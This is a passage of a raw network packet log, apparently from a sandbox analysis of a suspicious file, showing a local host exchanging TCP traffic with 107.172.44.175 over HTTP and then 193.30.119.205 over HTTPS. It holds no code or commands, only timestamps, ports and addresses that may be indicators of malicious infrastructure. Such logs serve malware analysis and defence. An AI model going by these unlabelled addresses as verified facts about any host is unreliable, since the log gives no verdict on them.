                                                            Nov 26, 2024 15:49:09.114737034 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.115597010 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.115647078 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.115724087 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.115781069 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.116616964 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.116673946 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.116786003 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.116842985 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.117696047 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.117791891 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.117887974 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.117949009 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.118963003 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.119030952 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.119062901 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.119117975 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.119827986 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.119914055 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.256618977 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.256724119 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.256823063 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.256871939 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.256989956 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.257036924 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.257236958 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.257292986 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.258094072 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.258136988 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.258361101 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.258403063 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:09.259195089 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:09.259241104 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:12.162573099 CET8049166107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:12.162636995 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:13.577362061 CET4916680192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:14.987938881 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:15.109478951 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:15.109601021 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:15.109826088 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:15.229737043 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.286005020 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.286130905 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.286144018 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.286144972 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.286176920 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.286184072 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.286673069 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.286684036 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.286695004 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.286714077 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.286726952 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.287606955 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.287623882 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.287635088 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.287655115 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.287669897 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.288494110 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.288538933 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.288718939 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.406301022 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.406398058 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.406416893 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.406461954 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.487154007 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.487220049 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.487257004 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.487288952 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.491291046 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.491353035 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.491486073 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.491527081 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.500097036 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.500154018 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.500245094 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.500284910 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.508363962 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.508423090 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.508474112 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.508514881 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.516592979 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.516645908 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.516683102 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.516725063 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.524976969 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.525031090 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.525084019 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.525125027 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.533294916 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.533354998 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.533478975 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.533520937 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.541773081 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.541832924 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.541898966 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.541939020 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.550251961 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.550312996 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.550352097 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.550383091 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.557805061 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.557858944 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.557943106 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.557982922 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.565500975 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.565557003 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.565618992 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.565660000 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.688204050 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.688272953 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.688385963 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.688426018 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.690912008 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.690958977 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.691813946 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.691859007 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.691987038 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.692028999 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.697316885 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.697376013 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.697443008 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.697484016 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.702819109 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.702869892 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.702944994 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.702986956 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.708235979 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.708319902 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.708393097 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.708436012 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.713356972 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.713413000 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.713545084 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.713587046 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.718946934 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.718997955 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.719031096 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.719072104 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.724493980 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.724546909 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.724610090 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.724652052 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.729497910 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.729557037 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.729636908 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.729677916 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.734941959 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.734993935 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.735047102 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.735086918 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.740583897 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.740634918 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.740757942 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.740798950 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.745737076 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.745789051 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.745815992 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.745850086 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.750015020 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.750061989 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.750157118 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.750199080 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.754823923 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.754869938 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.755141973 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.755186081 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.759691000 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.759733915 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.759885073 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.759936094 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.764775991 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.764830112 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.764885902 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.764928102 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.771486998 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.771537066 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.771760941 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.771802902 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.776674986 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.776727915 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.776882887 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.776926994 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.780874014 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.780921936 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.780960083 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.781004906 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.785402060 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.785456896 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.890518904 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.890577078 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.890614986 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.890652895 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.894946098 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.894995928 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.896173954 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.896188021 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.896217108 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.896229029 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.898195028 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.898242950 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.898535013 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.898578882 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.903381109 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.903420925 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.903556108 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.903595924 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.907326937 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.907373905 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.907618046 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.907672882 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.911638975 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.911652088 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.911689043 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.915584087 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.915631056 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.915738106 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.915776014 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.919368029 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.919414043 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.919538021 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.919579983 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.923405886 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.923453093 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.923585892 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.923628092 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.926393032 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.926439047 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.926541090 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.926580906 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.930095911 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.930150986 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.930272102 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.930314064 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.934046984 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.934088945 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.934189081 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.934226036 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.936857939 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.936909914 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.937202930 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.937246084 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.941406012 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.941451073 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.941762924 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.941819906 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.945390940 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.945437908 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.945570946 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.945610046 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.949248075 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.949290991 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.949454069 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.949495077 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.953350067 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.953394890 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.953540087 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.953583956 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.956968069 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.957016945 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.957144022 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.957186937 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.960931063 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.960944891 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.960978031 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.964766026 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.964811087 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.964951992 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.964992046 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.968142986 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.968154907 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.968199015 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.972390890 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.972434998 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.972570896 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.972614050 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.976098061 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.976147890 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.976265907 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.976319075 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.981167078 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.981211901 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.981349945 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.981390953 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.984899044 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.984910965 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.984941006 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.984957933 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.988574982 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.988617897 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:16.988888025 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:16.988929987 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.014637947 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.014755964 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.014799118 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.014842987 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.017956018 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.017976046 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.018026114 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.019061089 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.019073963 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.019117117 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.022248030 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.022317886 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.022397041 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.022435904 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.025765896 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.025827885 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.029083967 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.029155970 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.029253960 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.029304028 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.031097889 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:17.031155109 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:17.038113117 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:21.276437998 CET8049167107.172.44.175192.168.2.22
                                                            Nov 26, 2024 15:49:21.276591063 CET4916780192.168.2.22107.172.44.175
                                                            Nov 26, 2024 15:49:23.304725885 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:23.304790020 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:23.304846048 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:23.315697908 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:23.315722942 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.203949928 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.204045057 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.209342003 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.209372997 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.209681988 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.264255047 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.307333946 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.695759058 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.695790052 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.695844889 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.695883989 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.714342117 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.714351892 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.714416027 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.714441061 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.918289900 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.918337107 CET44349168193.30.119.205192.168.2.22
                                                            Nov 26, 2024 15:49:25.918369055 CET49168443192.168.2.22193.30.119.205
                                                            Nov 26, 2024 15:49:25.918397903 CET44349168193.30.119.205192.168.2.22
